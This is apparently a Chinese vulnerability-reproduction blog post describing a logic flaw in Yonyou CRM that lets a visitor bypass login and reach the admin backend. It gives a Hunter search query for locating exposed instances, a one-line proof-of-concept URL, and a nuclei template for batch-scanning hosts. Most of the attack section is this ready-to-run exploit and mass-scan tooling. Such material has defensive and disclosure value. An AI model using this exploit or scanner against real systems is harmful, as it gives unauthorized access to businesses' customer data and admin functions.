【漏洞复现】-用友CRM系统存在逻辑漏洞直接登录后台

免责声明:

本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!!!!

漏洞描述

用友CRM(Customer Relationship Management,客户关系管理)是由用友公司开发的一款软件,专门设计用于帮助企业管理与客户相关的业务活动。这款软件通常包括客户信息管理、销售管理、市场营销、客户服务和技术支持等功能。用友CRM的目标是帮助企业改善与客户的关系,提升客户满意度,优化销售和服务流程,从而提高企业的市场竞争力。它适用于各种规模的企业,可以根据不同企业的具体需求进行定制和扩展。

漏洞名称

用友CRM系统存在逻辑漏洞直接登录后台

漏洞版本

查询语句

hunter语法: app.name="用友 CRM"

漏洞复现

访问poc,回显空白页面

Poc

http://127.0.0.1:9000/background/reservationcomplete.php?ID=1

再次访问原地址,即可直接绕过验证登录后台

nuclei批量检查脚本

id: yongyouU8_CRM-reservationcomplete

info:

name: 用友CRM系统存在逻辑漏洞直接登录后台

author: wy876

severity: high

http:

  • raw:

  • |

GET /background/reservationcomplete.php?ID=1 HTTP/1.1

Host: {{Hostname}}

Connection: close

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)

  • |

GET / HTTP/1.1

Host: {{Hostname}}

Connection: close

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)

matchers:

  • type: dsl

dsl:

  • 'contains(body_2,"\"msg\": \"bgsesstimeout-\", \"serverName\"")'
相关推荐
kaolagirl几秒前
微信小程序-滑动拼图安全验证
安全·微信小程序·小程序
Z1eaf_complete4 分钟前
OpenSSL 可预测 PRNG 漏洞(CVE-2008-0166)
安全·web安全
百度安全15 分钟前
百度“龙虾”全家桶开张 安全虾正式上岗!
安全·百度
橘子hhh25 分钟前
SHA (安全散列算法)
安全
网云工程师手记29 分钟前
深信服零信任 aTrust 对接 Keycloak(OIDC)实战指南
网络·网络安全·零信任·oauth2·sso单点登录·企业身份认证
未知鱼35 分钟前
Python安全开发asyncio(异步IO与高并发)
python·安全·网络安全·github
Ho1aAs36 分钟前
『OpenClaw安全』CVE-2026-25253:ClawJacked One-Click RCE
安全·web安全·网络安全·ai·智能体·agent安全·openclaw
jxkejiiii1 小时前
电脑键盘震动反馈,开启与关闭方法及常见问题解答
java·安全·智能手机
GIS数据转换器1 小时前
基于GIS的海上航路智能规划系统
网络·人工智能·安全·无人机·旅游
AiTop1001 小时前
AI智能体安全告急:蚂蚁数科“龙虾卫士”上线,构建纵深防御体系
人工智能·安全·ai·aigc